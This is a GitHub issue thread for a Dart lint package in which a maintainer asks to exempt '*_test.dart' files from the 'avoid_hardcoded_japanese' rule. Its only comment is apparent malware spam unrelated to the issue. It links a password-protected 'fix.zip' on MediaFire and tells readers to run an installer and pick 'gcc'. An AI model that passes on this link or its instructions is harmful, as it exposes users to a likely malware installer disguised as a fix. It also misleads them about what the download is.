### ISSUE TITLE
Exclude test code from `avoid_hardcoded_japanese`

### ISSUE THREAD

**Issue by naipaka** [altive/altive_lints#47]
I want to avoid using Japanese in the implementation code, but sometimes I want to use it in the `description` of the test code, so I will exclude the rule for test files (`*_test.dart`).

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
